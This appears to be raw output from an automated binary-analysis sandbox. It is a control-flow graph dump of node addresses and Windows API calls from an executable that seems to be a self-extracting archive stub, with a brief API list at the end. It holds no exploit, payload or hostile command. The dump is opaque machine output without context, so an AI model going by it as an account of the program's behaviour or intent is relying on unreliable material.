e40659 _wcslen 23906->23907 23908 e317e9 78 API calls 23907->23908 23909 e4067e 23908->23909 23909->23630 23911 e37b17 __EH_prolog 23910->23911 23947 e3ce40 23911->23947 23913 e37b32 23953 e4eb38 23913->23953 23915 e37b5c 23962 e44a76 23915->23962 23918 e37c7d 23919 e37c87 23918->23919 23921 e37cf1 23919->23921 23994 e3a56d 23919->23994 23923 e37d50 23921->23923 23972 e38284 23921->23972 23922 e37d92 23922->23634 23923->23922 24000 e3138b 74 API calls 23923->24000 23927 e37bac 23926->23927 23929 e37bb3 23926->23929 23928 e42297 86 API calls 23927->23928 23928->23929 23932 e317ff 23930->23932 23942 e3185a __InternalCxxFrameHandler 23930->23942 23931 e31828 23934 e31887 23931->23934 23939 e31847 ___std_exception_copy 23931->23939 23932->23931 23943 e36c36 76 API calls __vswprintf_c_l 23932->23943 23936 e53e3e 22 API calls 23934->23936 23935 e3181e 23944 e36ca7 75 API calls 23935->23944 23938 e3188e 23936->23938 23938->23942 23946 e36ca7 75 API calls 23938->23946 23939->23942 23945 e36ca7 75 API calls 23939->23945 23942->23905 23943->23935 23944->23931 23945->23942 23946->23942 23948 e3ce4a __EH_prolog 23947->23948 23949 e4eb38 8 API calls 23948->23949 23950 e3ce8d 23949->23950 23951 e4eb38 8 API calls 23950->23951 23952 e3ceb1 23951->23952 23952->23913 23955 e4eb3d ___std_exception_copy 23953->23955 23954 e4eb57 23954->23915 23955->23954 23958 e4eb59 23955->23958 23968 e57a5e 7 API calls 2 library calls 23955->23968 23957 e4f5c9 23970 e5238d RaiseException 23957->23970 23958->23957 23969 e5238d RaiseException 23958->23969 23961 e4f5e6 23963 e44a80 __EH_prolog 23962->23963 23964 e4eb38 8 API calls 23963->23964 23965 e44a9c 23964->23965 23966 e37b8b 23965->23966 23971 e40e46 80 API calls 23965->23971 23966->23918 23968->23955 23969->23957 23970->23961 23971->23966 23973 e3828e __EH_prolog 23972->23973 24001 e313dc 23973->24001 23975 e382aa 23976 e382bb 23975->23976 24144 e39f42 23975->24144 23979 e382f2 23976->23979 24009 e31a04 23976->24009 24140 e31692 23979->24140 
23982 e382ee 23982->23979 23991 e3a56d 7 API calls 23982->23991 23992 e38389 23982->23992 24148 e3c0c5 CompareStringW _wcslen 23982->24148 23985 e383e8 24036 e31f6d 23985->24036 23989 e383f3 23989->23979 24040 e33b2d 23989->24040 24052 e3848e 23989->24052 23991->23982 24028 e38430 23992->24028 23995 e3a582 23994->23995 23996 e3a5b0 23995->23996 24423 e3a69b 23995->24423 23996->23919 23998 e3a592 23998->23996 23999 e3a597 FindClose 23998->23999 23999->23996 24000->23922 24002 e313e1 __EH_prolog 24001->24002 24003 e3ce40 8 API calls 24002->24003 24004 e31419 24003->24004 24005 e4eb38 8 API calls 24004->24005 24008 e31474 __cftof 24004->24008 24006 e31461 24005->24006 24006->24008 24149 e3b505 24006->24149 24008->23975 24010 e31a0e __EH_prolog 24009->24010 24022 e31a61 24010->24022 24024 e31b9b 24010->24024 24165 e313ba 24010->24165 24012 e31bc7 24177 e3138b 74 API calls 24012->24177 24015 e33b2d 101 API calls 24019 e31c12 24015->24019 24016 e31bd4 24016->24015 24016->24024 24017 e31c5a 24021 e31c8d 24017->24021 24017->24024 24178 e3138b 74 API calls 24017->24178 24019->24017 24020 e33b2d 101 API calls 24019->24020 24020->24019 24021->24024 24026 e39e80 79 API calls 24021->24026 24022->24012 24022->24016 24022->24024 24023 e33b2d 101 API calls 24025 e31cde 24023->24025 24024->23982 24025->24023 24025->24024 24026->24025 24198 e3cf3d 24028->24198 24030 e38440 24202 e413d2 GetSystemTime SystemTimeToFileTime 24030->24202 24032 e383a3 24032->23985 24033 e41b66 24032->24033 24207 e4de6b 24033->24207 24037 e31f72 __EH_prolog 24036->24037 24039 e31fa6 24037->24039 24215 e319af 24037->24215 24039->23989 24041 e33b39 24040->24041 24042 e33b3d 24040->24042 24041->23989 24051 e39e80 79 API calls 24042->24051 24043 e33b4f 24044 e33b6a 24043->24044 24045 e33b78 24043->24045 24047 e33baa 24044->24047 24345 e332f7 89 API calls 2 library calls 24044->24345 24346 e3286b 101 API calls 3 library calls 24045->24346 24047->23989 24049 e33b76 24049->24047 24347 e320d7 74 API calls 
24049->24347 24051->24043 24053 e38498 __EH_prolog 24052->24053 24056 e384d5 24053->24056 24063 e38513 24053->24063 24372 e48c8d 103 API calls 24053->24372 24055 e384f5 24057 e384fa 24055->24057 24058 e3851c 24055->24058 24056->24055 24061 e3857a 24056->24061 24056->24063 24057->24063 24373 e37a0d 152 API calls 24057->24373 24058->24063 24374 e48c8d 103 API calls 24058->24374 24061->24063 24348 e35d1a 24061->24348 24063->23989 24064 e38605 24064->24063 24354 e38167 24064->24354 24067 e38797 24068 e3a56d 7 API calls 24067->24068 24069 e38802 24067->24069 24068->24069 24360 e37c0d 24069->24360 24071 e3d051 82 API calls 24077 e3885d 24071->24077 24072 e3898b 24377 e32021 74 API calls 24072->24377 24073 e38a5f 24078 e38ab6 24073->24078 24092 e38a6a 24073->24092 24074 e38992 24074->24073 24080 e389e1 24074->24080 24077->24063 24077->24071 24077->24072 24077->24074 24375 e38117 84 API calls 24077->24375 24376 e32021 74 API calls 24077->24376 24084 e38a4c 24078->24084 24380 e37fc0 97 API calls 24078->24380 24079 e38ab4 24085 e3959a 80 API calls 24079->24085 24081 e38b14 24080->24081 24080->24084 24086 e3a231 3 API calls 24080->24086 24082 e38b82 24081->24082 24129 e39105 24081->24129 24381 e398bc 24081->24381 24090 e3ab1a 8 API calls 24082->24090 24083 e3959a 80 API calls 24083->24063 24084->24079 24084->24081 24085->24063 24088 e38a19 24086->24088 24088->24084 24378 e392a3 97 API calls 24088->24378 24093 e38bd1 24090->24093 24092->24079 24379 e37db2 101 API calls 24092->24379 24095 e3ab1a 8 API calls 24093->24095 24113 e38be7 24095->24113 24098 e38b70 24385 e36e98 77 API calls 24098->24385 24100 e38cbc 24101 e38e40 24100->24101 24102 e38d18 24100->24102 24105 e38e52 24101->24105 24106 e38e66 24101->24106 24110 e38d49 24101->24110 24103 e38d8a 24102->24103 24104 e38d28 24102->24104 24111 e38167 19 API calls 24103->24111 24107 e38d6e 24104->24107 24114 e38d37 24104->24114 24108 e39215 123 API calls 24105->24108 24109 e43377 75 API calls 24106->24109 24107->24110 24388 
e377b8 111 API calls 24107->24388 24108->24110 24112 e38e7f 24109->24112 24128 e38f85 24110->24128 24392 e32021 74 API calls 24110->24392 24115 e38dbd 24111->24115 24391 e43020 123 API calls 24112->24391 24113->24100 24120 e3981a 79 API calls 24113->24120 24123 e38c93 24113->24123 24387 e32021 74 API calls 24114->24387 24115->24110 24121 e38de6 24115->24121 24122 e38df5 24115->24122 24120->24123 24389 e37542 85 API calls 24121->24389 24390 e39155 93 API calls __EH_prolog 24122->24390 24123->24100 24386 e39a3c 82 API calls 24123->24386 24127 e39090 24127->24129 24131 e3a4ed 3 API calls 24127->24131 24128->24127 24128->24129 24130 e3903e 24128->24130 24366 e39f09 SetEndOfFile 24128->24366 24129->24083 24367 e39da2 24130->24367 24134 e390eb 24131->24134 24134->24129 24393 e32021 74 API calls 24134->24393 24135 e39085 24137 e39620 77 API calls 24135->24137 24137->24127 24138 e390fb 24394 e36dcb 76 API calls _wcschr 24138->24394 24141 e316a4 24140->24141 24410 e3cee1 24141->24410 24145 e39f59 24144->24145 24146 e39f63 24145->24146 24422 e36d0c 78 API calls 24145->24422 24146->23976 24148->23982 24150 e3b50f __EH_prolog 24149->24150 24155 e3f1d0 82 API calls 24150->24155 24152 e3b521 24156 e3b61e 24152->24156 24155->24152 24157 e3b630 __cftof 24156->24157 24160 e410dc 24157->24160 24163 e4109e GetCurrentProcess GetProcessAffinityMask 24160->24163 24164 e3b597 24163->24164 24164->24008 24179 e31732 24165->24179 24167 e313d6 24168 e39e80 24167->24168 24169 e39e92 24168->24169 24174 e39ea5 24168->24174 24173 e39eb0 24169->24173 24196 e36d5b 77 API calls 24169->24196 24170 e39eb8 SetFilePointer 24172 e39ed4 GetLastError 24170->24172 24170->24173 24172->24173 24175 e39ede 24172->24175 24173->24022 24174->24170 24174->24173 24175->24173 24197 e36d5b 77 API calls 24175->24197 24177->24024 24178->24021 24180 e317a0 __InternalCxxFrameHandler 24179->24180 24181 e31748 24179->24181 24180->24167 24182 e31771 24181->24182 24192 e36c36 76 API calls __vswprintf_c_l 24181->24192 24183 
e317c7 24182->24183 24189 e3178d ___std_exception_copy 24182->24189 24185 e53e3e 22 API calls 24183->24185 24187 e317ce 24185->24187 24186 e31767 24193 e36ca7 75 API calls 24186->24193 24187->24180 24195 e36ca7 75 API calls 24187->24195 24189->24180 24194 e36ca7 75 API calls 24189->24194 24192->24186 24193->24182 24194->24180 24195->24180 24196->24174 24197->24173 24199 e3cf4d 24198->24199 24201 e3cf54 24198->24201 24203 e3981a 24199->24203 24201->24030 24202->24032 24204 e39833 24203->24204 24206 e39e80 79 API calls 24204->24206 24205 e39865 24205->24201 24206->24205 24208 e4de78 24207->24208 24209 e3e617 53 API calls 24208->24209 24210 e4de9b 24209->24210 24211 e34092 _swprintf 51 API calls 24210->24211 24212 e4dead 24211->24212 24213 e4d4d4 16 API calls 24212->24213 24214 e41b7c 24213->24214 24214->23985 24216 e319bf 24215->24216 24218 e319bb 24215->24218 24219 e318f6 24216->24219 24218->24039 24220 e31908 24219->24220 24221 e31945 24219->24221 24222 e33b2d 101 API calls 24220->24222 24227 e33fa3 24221->24227 24225 e31928 24222->24225 24225->24218 24231 e33fac 24227->24231 24228 e33b2d 101 API calls 24228->24231 24229 e31966 24229->24225 24232 e31e50 24229->24232 24231->24228 24231->24229 24244 e40e08 24231->24244 24233 e31e5a __EH_prolog 24232->24233 24252 e33bba 24233->24252 24235 e31e84 24236 e31732 78 API calls 24235->24236 24238 e31f0b 24235->24238 24237 e31e9b 24236->24237 24280 e318a9 78 API calls 24237->24280 24238->24225 24240 e31eb3 24242 e31ebf _wcslen 24240->24242 24281 e41b84 MultiByteToWideChar 24240->24281 24282 e318a9 78 API calls 24242->24282 24245 e40e0f 24244->24245 24246 e40e2a 24245->24246 24250 e36c31 RaiseException _com_raise_error 24245->24250 24248 e40e3b SetThreadExecutionState 24246->24248 24251 e36c31 RaiseException _com_raise_error 24246->24251 24248->24231 24250->24246 24251->24248 24253 e33bc4 __EH_prolog 24252->24253 24254 e33bf6 24253->24254 24255 e33bda 24253->24255 24257 e33e51 24254->24257 24260 e33c22 24254->24260 24308 
e3138b 74 API calls 24255->24308 24325 e3138b 74 API calls 24257->24325 24259 e33be5 24259->24235 24260->24259 24283 e43377 24260->24283 24262 e33ca3 24264 e33d2e 24262->24264 24279 e33c9a 24262->24279 24311 e3d051 24262->24311 24263 e33c9f 24263->24262 24310 e320bd 78 API calls 24263->24310 24293 e3ab1a 24264->24293 24266 e33c71 24266->24262 24266->24263 24267 e33c8f 24266->24267 24309 e3138b 74 API calls 24267->24309 24269 e33d41 24273 e33dd7 24269->24273 24274 e33dc7 24269->24274 24317 e43020 123 API calls 24273->24317 24297 e39215 24274->24297 24277 e33dd5 24277->24279 24318 e32021 74 API calls 24277->24318 24319 e42297 24279->24319 24280->24240 24281->24242 24282->24238 24284 e4338c 24283->24284 24286 e43396 ___std_exception_copy 24283->24286 24326 e36ca7 75 API calls 24284->24326 24287 e434c6 24286->24287 24290 e4341c 24286->24290 24292 e43440 __cftof 24286->24292 24328 e5238d RaiseException 24287->24328 24327 e432aa 75 API calls 3 library calls 24290->24327 24291 e434f2 24292->24266 24294 e3ab28 24293->24294 24296 e3ab32 24293->24296 24295 e4eb38 8 API calls 24294->24295 24295->24296 24296->24269 24298 e3921f __EH_prolog 24297->24298 24329 e37c64 24298->24329 24301 e313ba 78 API calls 24302 e39231 24301->24302 24332 e3d114 24302->24332 24304 e39243 24305 e3928a 24304->24305 24307 e3d114 118 API calls 24304->24307 24341 e3d300 97 API calls __InternalCxxFrameHandler 24304->24341 24305->24277 24307->24304 24308->24259 24309->24279 24310->24262 24312 e3d072 24311->24312 24313 e3d084 24311->24313 24342 e3603a 82 API calls 24312->24342 24343 e3603a 82 API calls 24313->24343 24316 e3d07c 24316->24264 24317->24277 24318->24279 24321 e422a1 24319->24321 24320 e422ba 24344 e40eed 86 API calls 24320->24344 24321->24320 24324 e422ce 24321->24324 24323 e422c1 24323->24324 24325->24259 24326->24286 24327->24292 24328->24291 24330 e3b146 GetVersionExW 24329->24330 24331 e37c69 24330->24331 24331->24301 24338 e3d12a __InternalCxxFrameHandler 24332->24338 24333 e3d29a 24334 
e3d0cb 6 API calls 24333->24334 24336 e3d2ce 24333->24336 24334->24336 24335 e40e08 SetThreadExecutionState RaiseException 24339 e3d291 24335->24339 24336->24335 24337 e48c8d 103 API calls 24337->24338 24338->24333 24338->24337 24338->24339 24340 e3ac05 91 API calls 24338->24340 24339->24304 24340->24338 24341->24304 24342->24316 24343->24316 24344->24323 24345->24049 24346->24049 24347->24047 24349 e35d2a 24348->24349 24395 e35c4b 24349->24395 24352 e35d5d 24353 e35d95 24352->24353 24400 e3b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 24352->24400 24353->24064 24355 e38186 24354->24355 24356 e38232 24355->24356 24407 e3be5e 19 API calls __InternalCxxFrameHandler 24355->24407 24406 e41fac CharUpperW 24356->24406 24359 e3823b 24359->24067 24361 e37c22 24360->24361 24362 e37c5a 24361->24362 24408 e36e7a 74 API calls 24361->24408 24362->24077 24364 e37c52 24409 e3138b 74 API calls 24364->24409 24366->24130 24368 e39db3 24367->24368 24371 e39dc2 24367->24371 24369 e39db9 FlushFileBuffers 24368->24369 24368->24371 24369->24371 24370 e39e3f SetFileTime 24370->24135 24371->24370 24372->24056 24373->24063 24374->24063 24375->24077 24376->24077 24377->24074 24378->24084 24379->24079 24380->24084 24382 e38b5a 24381->24382 24383 e398c5 GetFileType 24381->24383 24382->24082 24384 e32021 74 API calls 24382->24384 24383->24382 24384->24098 24385->24082 24386->24100 24387->24110 24388->24110 24389->24110 24390->24110 24391->24110 24392->24128 24393->24138 24394->24129 24401 e35b48 24395->24401 24397 e35c6c 24397->24352 24399 e35b48 2 API calls 24399->24397 24400->24352 24404 e35b52 24401->24404 24402 e35c3a 24402->24397 24402->24399 24404->24402 24405 e3b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 24404->24405 24405->24404 24406->24359 24407->24356 24408->24364 24409->24362 24411 e3cef2 24410->24411 24416 e3a99e 24411->24416 24413 e3cf24 24414 e3a99e 86 API calls 24413->24414 24415 e3cf2f 24414->24415 24417 e3a9c1 24416->24417 24420 e3a9d5 24416->24420 24421 
e40eed 86 API calls 24417->24421 24419 e3a9c8 24419->24420 24420->24413 24421->24419 24422->24146 24424 e3a6a8 24423->24424 24425 e3a6c1 FindFirstFileW 24424->24425 24426 e3a727 FindNextFileW 24424->24426 24428 e3a6d0 24425->24428 24433 e3a709 24425->24433 24427 e3a732 GetLastError 24426->24427 24426->24433 24427->24433 24429 e3bb03 GetCurrentDirectoryW 24428->24429 24430 e3a6e0 24429->24430 24431 e3a6e4 FindFirstFileW 24430->24431 24432 e3a6fe GetLastError 24430->24432 24431->24432 24431->24433 24432->24433 24433->23998 24443 e4a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24434->24443 24436 e4a5cd 24437 e4a5d9 24436->24437 24444 e4a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24436->24444 24437->23641 24437->23642 24439->23648 24440->23651 24441->23651 24442->23654 24443->24436 24444->24437 24445->23662 24447 e39f42 78 API calls 24446->24447 24448 e31fe8 24447->24448 24449 e31a04 101 API calls 24448->24449 24452 e32005 24448->24452 24450 e31ff5 24449->24450 24450->24452 24453 e3138b 74 API calls 24450->24453 24452->23670 24452->23671 24453->24452 24455 e4b583 GetMessageW 24454->24455 24456 e4b5bc GetDlgItem 24454->24456 24457 e4b5a8 TranslateMessage DispatchMessageW 24455->24457 24458 e4b599 IsDialogMessageW 24455->24458 24456->23681 24456->23682 24457->24456 24458->24456 24458->24457 25272 e494e0 GetClientRect 25307 e421e0 26 API calls std::bad_exception::bad_exception 25333 e4f2e0 46 API calls __RTC_Initialize 25334 e5bee0 GetCommandLineA GetCommandLineW 25308 e3f1e8 FreeLibrary 25309 e395f0 80 API calls 25335 e35ef0 82 API calls 24466 e598f0 24474 e5adaf 24466->24474 24470 e5990c 24471 e59919 24470->24471 24482 e59920 11 API calls 24470->24482 24473 e59904 24483 e5ac98 24474->24483 24477 e5adee TlsAlloc 24478 e5addf 24477->24478 24479 e4fbbc CatchGuardHandler 5 API calls 24478->24479 24480 e598fa 24479->24480 24480->24473 24481 e59869 20 API calls 2 library calls 24480->24481 24481->24470 24482->24473 24484 e5acc8 24483->24484 24487 e5acc4 24483->24487 
24484->24477 24484->24478 24485 e5ace8 24485->24484 24488 e5acf4 GetProcAddress 24485->24488 24487->24484 24487->24485 24490 e5ad34 24487->24490 24489 e5ad04 _abort 24488->24489 24489->24484 24491 e5ad55 LoadLibraryExW 24490->24491 24495 e5ad4a 24490->24495 24492 e5ad72 GetLastError 24491->24492 24493 e5ad8a 24491->24493 24492->24493 24496 e5ad7d LoadLibraryExW 24492->24496 24494 e5ada1 FreeLibrary 24493->24494 24493->24495 24494->24495 24495->24487 24496->24493 24497 e5abf0 24499 e5abfb 24497->24499 24500 e5ac24 24499->24500 24501 e5ac20 24499->24501 24503 e5af0a 24499->24503 24510 e5ac50 DeleteCriticalSection 24500->24510 24504 e5ac98 _abort 5 API calls 24503->24504 24505 e5af31 24504->24505 24506 e5af4f InitializeCriticalSectionAndSpinCount 24505->24506 24509 e5af3a 24505->24509 24506->24509 24507 e4fbbc CatchGuardHandler 5 API calls 24508 e5af66 24507->24508 24508->24499 24509->24507 24510->24501 25273 e588f0 7 API calls ___scrt_uninitialize_crt 25311 e4fd4f 9 API calls 2 library calls 25275 e52cfb 38 API calls 4 library calls 25312 e4b5c0 100 API calls 25350 e477c0 118 API calls 25351 e4ffc0 RaiseException _com_raise_error _com_error::_com_error 24537 e4dec2 24538 e4decf 24537->24538 24539 e3e617 53 API calls 24538->24539 24540 e4dedc 24539->24540 24541 e34092 _swprintf 51 API calls 24540->24541 24542 e4def1 SetDlgItemTextW 24541->24542 24543 e4b568 5 API calls 24542->24543 24544 e4df0e 24543->24544 25337 e462ca 123 API calls __InternalCxxFrameHandler 24551 e4e2d7 24552 e4e1db 24551->24552 24553 e4e85d ___delayLoadHelper2@8 14 API calls 24552->24553 24553->24552 24555 e4e1d1 14 API calls ___delayLoadHelper2@8 25353 e5a3d0 21 API calls 2 library calls 24556 e310d5 24561 e35abd 24556->24561 24562 e35ac7 __EH_prolog 24561->24562 24563 e3b505 84 API calls 24562->24563 24564 e35ad3 24563->24564 24568 e35cac GetCurrentProcess GetProcessAffinityMask 24564->24568 25354 e62bd0 VariantClear 25277 e4f4d3 20 API calls 25339 e50ada 51 API calls 2 library calls 25314 e4eda7 
48 API calls _unexpected 25355 e4f3a0 27 API calls 25280 e5a4a0 71 API calls _free 25281 e4dca1 DialogBoxParamW 25282 e608a0 IsProcessorFeaturePresent 25356 e36faa 111 API calls 3 library calls 25316 e4b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24767 e4f3b2 24768 e4f3be __FrameHandler3::FrameUnwindToState 24767->24768 24799 e4eed7 24768->24799 24770 e4f3c5 24771 e4f518 24770->24771 24774 e4f3ef 24770->24774 24872 e4f838 4 API calls 2 library calls 24771->24872 24773 e4f51f 24865 e57f58 24773->24865 24785 e4f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24774->24785 24810 e58aed 24774->24810 24781 e4f40e 24783 e4f48f 24818 e4f953 GetStartupInfoW __cftof 24783->24818 24785->24783 24868 e57af4 38 API calls _abort 24785->24868 24786 e4f495 24819 e58a3e 51 API calls 24786->24819 24789 e4f49d 24820 e4df1e 24789->24820 24793 e4f4b1 24793->24773 24794 e4f4b5 24793->24794 24795 e4f4be 24794->24795 24870 e57efb 28 API calls _abort 24794->24870 24871 e4f048 12 API calls ___scrt_uninitialize_crt 24795->24871 24798 e4f4c6 24798->24781 24800 e4eee0 24799->24800 24874 e4f654 IsProcessorFeaturePresent 24800->24874 24802 e4eeec 24875 e52a5e 24802->24875 24804 e4eef1 24809 e4eef5 24804->24809 24883 e58977 24804->24883 24807 e4ef0c 24807->24770 24809->24770 24811 e58b04 24810->24811 24812 e4fbbc CatchGuardHandler 5 API calls 24811->24812 24813 e4f408 24812->24813 24813->24781 24814 e58a91 24813->24814 24815 e58ac0 24814->24815 24816 e4fbbc CatchGuardHandler 5 API calls 24815->24816 24817 e58ae9 24816->24817 24817->24785 24818->24786 24819->24789 24976 e40863 24820->24976 24824 e4df3d 25025 e4ac16 24824->25025 24826 e4df46 __cftof 24827 e4df59 GetCommandLineW 24826->24827 24828 e4dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24827->24828 24829 e4df68 24827->24829 24830 e34092 _swprintf 51 API calls 24828->24830 25029 e4c5c4 24829->25029 24832 e4e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24830->24832 25040 e4b6dd 
LoadBitmapW 24832->25040 24835 e4df76 OpenFileMappingW 24838 e4dfd6 CloseHandle 24835->24838 24839 e4df8f MapViewOfFile 24835->24839 24836 e4dfe0 25034 e4dbde 24836->25034 24838->24828 24842 e4dfa0 __InternalCxxFrameHandler 24839->24842 24843 e4dfcd UnmapViewOfFile 24839->24843 24847 e4dbde 2 API calls 24842->24847 24843->24838 24849 e4dfbc 24847->24849 24848 e490b7 8 API calls 24850 e4e0aa DialogBoxParamW 24848->24850 24849->24843 24851 e4e0e4 24850->24851 24852 e4e0f6 Sleep 24851->24852 24853 e4e0fd 24851->24853 24852->24853 24855 e4e10b 24853->24855 25070 e4ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 24853->25070 24856 e4e12a DeleteObject 24855->24856 24857 e4e146 24856->24857 24858 e4e13f DeleteObject 24856->24858 24859 e4e177 24857->24859 24860 e4e189 24857->24860 24858->24857 25071 e4dc3b 6 API calls 24859->25071 25067 e4ac7c 24860->25067 24862 e4e17d CloseHandle 24862->24860 24864 e4e1c3 24869 e4f993 GetModuleHandleW 24864->24869 25201 e57cd5 24865->25201 24868->24783 24869->24793 24870->24795 24871->24798 24872->24773 24874->24802 24887 e53b07 24875->24887 24879 e52a6f 24880 e52a7a 24879->24880 24901 e53b43 DeleteCriticalSection 24879->24901 24880->24804 24882 e52a67 24882->24804 24930 e5c05a 24883->24930 24886 e52a7d 7 API calls 2 library calls 24886->24809 24888 e53b10 24887->24888 24890 e53b39 24888->24890 24891 e52a63 24888->24891 24902 e53d46 24888->24902 24907 e53b43 DeleteCriticalSection 24890->24907 24891->24882 24893 e52b8c 24891->24893 24923 e53c57 24893->24923 24896 e52ba1 24896->24879 24898 e52baf 24899 e52bbc 24898->24899 24929 e52bbf 6 API calls ___vcrt_FlsFree 24898->24929 24899->24879 24901->24882 24908 e53c0d 24902->24908 24905 e53d7e InitializeCriticalSectionAndSpinCount 24906 e53d69 24905->24906 24906->24888 24907->24891 24909 e53c26 24908->24909 24910 e53c4f 24908->24910 24909->24910 24915 e53b72 24909->24915 24910->24905 24910->24906 24913 e53c3b GetProcAddress 24913->24910 24914 e53c49 24913->24914 24914->24910 24921 
e53b7e ___vcrt_FlsFree 24915->24921 24916 e53bf3 24916->24910 24916->24913 24917 e53b95 LoadLibraryExW 24918 e53bb3 GetLastError 24917->24918 24919 e53bfa 24917->24919 24918->24921 24919->24916 24920 e53c02 FreeLibrary 24919->24920 24920->24916 24921->24916 24921->24917 24922 e53bd5 LoadLibraryExW 24921->24922 24922->24919 24922->24921 24924 e53c0d ___vcrt_FlsFree 5 API calls 24923->24924 24925 e53c71 24924->24925 24926 e53c8a TlsAlloc 24925->24926 24927 e52b96 24925->24927 24927->24896 24928 e53d08 6 API calls ___vcrt_FlsFree 24927->24928 24928->24898 24929->24896 24933 e5c077 24930->24933 24934 e5c073 24930->24934 24931 e4fbbc CatchGuardHandler 5 API calls 24932 e4eefe 24931->24932 24932->24807 24932->24886 24933->24934 24936 e5a6a0 24933->24936 24934->24931 24937 e5a6ac __FrameHandler3::FrameUnwindToState 24936->24937 24948 e5ac31 EnterCriticalSection 24937->24948 24939 e5a6b3 24949 e5c528 24939->24949 24941 e5a6c2 24942 e5a6d1 24941->24942 24962 e5a529 29 API calls 24941->24962 24964 e5a6ed LeaveCriticalSection _abort 24942->24964 24945 e5a6cc 24963 e5a5df GetStdHandle GetFileType 24945->24963 24946 e5a6e2 _abort 24946->24933 24948->24939 24950 e5c534 __FrameHandler3::FrameUnwindToState 24949->24950 24951 e5c541 24950->24951 24952 e5c558 24950->24952 24973 e591a8 20 API calls _abort 24951->24973 24965 e5ac31 EnterCriticalSection 24952->24965 24955 e5c564 24961 e5c590 24955->24961 24966 e5c479 24955->24966 24956 e5c546 24974 e59087 26 API calls _abort 24956->24974 24959 e5c550 _abort 24959->24941 24975 e5c5b7 LeaveCriticalSection _abort 24961->24975 24962->24945 24963->24942 24964->24946 24965->24955 24967 e5b136 _abort 20 API calls 24966->24967 24968 e5c48b 24967->24968 24971 e5af0a 11 API calls 24968->24971 24972 e5c498 24968->24972 24969 e58dcc _free 20 API calls 24970 e5c4ea 24969->24970 24970->24955 24971->24968 24972->24969 24973->24956 24974->24959 24975->24959 24977 e4ec50 24976->24977 24978 e4086d GetModuleHandleW 24977->24978 24979 e408e7 24978->24979 
24980 e40888 GetProcAddress 24978->24980 24983 e40c14 GetModuleFileNameW 24979->24983 25081 e575fb 42 API calls __vsnwprintf_l 24979->25081 24981 e408a1 24980->24981 24982 e408b9 GetProcAddress 24980->24982 24981->24982 24984 e408cb 24982->24984 24997 e40c32 24983->24997 24984->24979 24986 e40b54 24986->24983 24987 e40b5f GetModuleFileNameW CreateFileW 24986->24987 24988 e40b8f SetFilePointer 24987->24988 24989 e40c08 CloseHandle 24987->24989 24988->24989 24990 e40b9d ReadFile 24988->24990 24989->24983 24990->24989 24993 e40bbb 24990->24993 24993->24989 24995 e4081b 2 API calls 24993->24995 24994 e40c94 GetFileAttributesW 24994->24997 24998 e40cac 24994->24998 24995->24993 24996 e40c5d CompareStringW 24996->24997 24997->24994 24997->24996 24997->24998 25072 e3b146 24997->25072 25075 e4081b 24997->25075 24999 e40cb7 24998->24999 25002 e40cec 24998->25002 25001 e40cd0 GetFileAttributesW 24999->25001 25003 e40ce8 24999->25003 25000 e40dfb 25024 e4a64d GetCurrentDirectoryW 25000->25024 25001->24999 25001->25003 25002->25000 25004 e3b146 GetVersionExW 25002->25004 25003->25002 25005 e40d06 25004->25005 25006 e40d73 25005->25006 25007 e40d0d 25005->25007 25008 e34092 _swprintf 51 API calls 25006->25008 25009 e4081b 2 API calls 25007->25009 25010 e40d9b AllocConsole 25008->25010 25011 e40d17 25009->25011 25012 e40df3 ExitProcess 25010->25012 25013 e40da8 GetCurrentProcessId AttachConsole 25010->25013 25014 e4081b 2 API calls 25011->25014 25082 e53e13 25013->25082 25015 e40d21 25014->25015 25017 e3e617 53 API calls 25015->25017 25019 e40d3c 25017->25019 25018 e40dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25018->25012 25020 e34092 _swprintf 51 API calls 25019->25020 25021 e40d4f 25020->25021 25022 e3e617 53 API calls 25021->25022 25023 e40d5e 25022->25023 25023->25012 25024->24824 25026 e4081b 2 API calls 25025->25026 25027 e4ac2a OleInitialize 25026->25027 25028 e4ac4d GdiplusStartup SHGetMalloc 25027->25028 25028->24826 25031 e4c5ce 25029->25031 25030 e4c6e4 
[Control-flow graph: the interactive node/edge list continues here and is omitted. API-call nodes appearing in this part of the graph: SetEnvironmentVariableW; CharUpperW; GetObjectW, DeleteObject; FindResourceW, SizeofResource, LoadResource, LockResource, GlobalAlloc, GlobalLock, GlobalUnlock, GlobalFree; GdipAlloc, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdipCloneImage, GdipDisposeImage, GdipFree, GdiplusShutdown, CoUninitialize; GetDC, GetDeviceCaps, ReleaseDC; GetVersionExW; GetSystemDirectoryW, LoadLibraryW; GetModuleFileNameW, GetModuleHandleW, GetModuleHandleExW, GetProcAddress, FreeLibrary; MultiByteToWideChar, WideCharToMultiByte, GetStringTypeW, LCMapStringW, GetCPInfo, IsDBCSLeadByte, GetOEMCP, GetACP, IsValidCodePage; CreateFileW, GetLastError, GetCurrentDirectoryW, SetFileTime, SetFilePointer, GetStdHandle, ReadFile, WriteFile, GetFileType, CloseHandle, FindClose; ExpandEnvironmentStringsW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, MoveFileExW, GetFullPathNameW, GetExitCodeProcess; CompareStringW, ShowWindow, SetWindowTextW, GetDlgItem, SendMessageW; EnterCriticalSection, LeaveCriticalSection, GetPEB, GetCurrentProcess, TerminateProcess, ExitProcess; GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, QueryPerformanceFrequency, GetProcessHeap, LocalFree.]

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E40863: GetModuleHandleW.KERNEL32(kernel32), ref: 00E4087C
                                                                                                                      • Part of subcall function 00E40863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E4088E
                                                                                                                      • Part of subcall function 00E40863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E408BF
                                                                                                                      • Part of subcall function 00E4A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00E4A655
